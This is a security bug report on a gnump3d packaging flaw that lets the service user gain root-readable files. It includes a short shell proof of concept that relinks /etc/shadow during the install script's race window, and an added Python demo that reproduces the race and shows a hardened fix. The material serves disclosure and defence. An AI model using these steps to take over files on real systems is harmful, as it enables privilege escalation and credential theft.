Bugzilla – Bug 1154229
VUL-0: CVE-2019-3697: gnump3d: LPE from gnump3d to root
Last modified: 2020-07-20 12:20:28 UTC
%post
# if there is no access.log file, create one with correct permissions.
# gnump3d does not do this.
test -f /var/log/gnump3d/access.log || {
  touch /var/log/gnump3d/access.log;
  chmod 640 /var/log/gnump3d/access.log;
  chown gnump3d /var/log/gnump3d/access.log
}

allows LPE on systems with fs.protected_hardlinks=0 if the race is won.

zypper ar https://download.opensuse.org/repositories/home:/jsegitz:/branches:/multimedia:/apps/openSUSE_Tumbleweed/home:jsegitz:branches:multimedia:apps.repo
to make winning the race easy

POC:

sh-5.0$ id
uid=63(gnump3d) gid=65534(nogroup) groups=65534(nogroup)
sh-5.0$ pwd
/var/log/gnump3d
sh-5.0$ rm access.log

As root:
zypper in -f gnump3d

When installation hangs, as gnump3d:
sh-5.0$ rm access.log; ln /etc/shadow access.log
sh-5.0$ ls -lah /etc/shadow
-rw-r----- 2 gnump3d shadow 1.6K Oct 16 15:58 /etc/shadow
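The window the report exploits is the gap between touch and the path-based chmod/chown in %post: the attacker, who can delete and recreate entries in /var/log/gnump3d, swaps the freshly created access.log for a hard link (or symlink) to /etc/shadow, and chmod/chown then operate on the link target. The following is an added illustration, not code from the bug report or from the gnump3d package. It reproduces that sequence against a constructed stand-in for /etc/shadow inside a temporary directory (no root needed, so the chown step is shown only as optional fchown parameters), and places the vulnerable logic next to a version that creates the file with O_CREAT|O_EXCL|O_NOFOLLOW and fixes ownership and mode through the open file descriptor instead of the path. The race_hook argument is an assumption of the example: it stands in for the attacker's inotify-triggered relink at exactly the moment the report describes. This does not remove the root cause (a log directory the service user can write to); it only closes the chmod/chown window.

```python
import os
import stat
import tempfile


def vulnerable_create(path, race_hook=lambda: None):
    """Mirror of the %post logic: test -f || { touch; chmod 640; chown }.

    race_hook simulates the attacker acting between touch and chmod
    (in the report this is an inotify watcher that relinks the file)."""
    if not os.path.isfile(path):
        open(path, "a").close()        # touch
        race_hook()                    # attacker: rm access.log; ln /etc/shadow access.log
        os.chmod(path, 0o640)          # follows the link -> lands on the link target
        # chown gnump3d <path> would follow the link in the same way


def hardened_create(path, race_hook=lambda: None, uid=None, gid=None):
    """Create the log file atomically and set mode/owner via the fd.

    O_EXCL refuses any pre-existing entry (regular file, symlink, hard link);
    O_NOFOLLOW refuses a symlink; fchmod/fchown act on the inode we opened,
    so relinking the path afterwards gains the attacker nothing.
    Returns True if the file was created, False if something already existed."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    try:
        fd = os.open(path, flags, 0o640)
    except FileExistsError:
        return False
    try:
        race_hook()                    # same attacker timing as above
        os.fchmod(fd, 0o640)           # fd-based: the created inode, not the path
        if uid is not None and gid is not None:
            os.fchown(fd, uid, gid)    # assumed fix-up for "chown gnump3d"; needs root
    finally:
        os.close(fd)
    return True


def demo():
    """Run both versions against a constructed secret; return observed results."""
    d = tempfile.mkdtemp()
    secret = os.path.join(d, "shadow")            # constructed stand-in for /etc/shadow
    with open(secret, "w") as fh:
        fh.write("root:$6$constructed$hash:18000:0:99999:7:::\n")
    os.chmod(secret, 0o600)
    log = os.path.join(d, "access.log")           # stand-in for /var/log/gnump3d/access.log

    # Scenario 1: the race from the report. access.log was removed beforehand,
    # attacker waits for touch, then replaces the new file with a hard link.
    def relink_hard():
        os.unlink(log)
        os.link(secret, log)

    vulnerable_create(log, relink_hard)
    vuln_mode = stat.S_IMODE(os.stat(secret).st_mode)   # secret is now 0o640

    os.chmod(secret, 0o600)                               # reset for the next run
    os.unlink(log)

    # Scenario 2: identical timing against the hardened version, this time
    # with a symlink (the report notes symlinks work too).
    def relink_sym():
        os.unlink(log)
        os.symlink(secret, log)

    created = hardened_create(log, relink_sym)
    hard_mode = stat.S_IMODE(os.stat(secret).st_mode)    # secret is still 0o600

    # Scenario 3: attacker plants the link before %post runs; the hardened
    # version refuses instead of adopting the link. (log is the symlink left
    # behind by scenario 2.)
    preplanted = hardened_create(log)
    return vuln_mode, created, hard_mode, preplanted


if __name__ == "__main__":
    print(demo())
```

Run as an unprivileged user; demo() returns (0o640, True, 0o600, False): the vulnerable sequence changed the secret's mode through the hard link, the hardened sequence created its file and left the secret untouched despite the relink, and refused outright when a link was already in place.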
works with symlinks, so no need for fs.protected_hardlinks=0
I can reliably exploit this using inotify and relinking after touch ran. Please use CVE-2019-3697 to track this
Sent delete request to remove this from Factory as it's unmaintained
dropped from Factory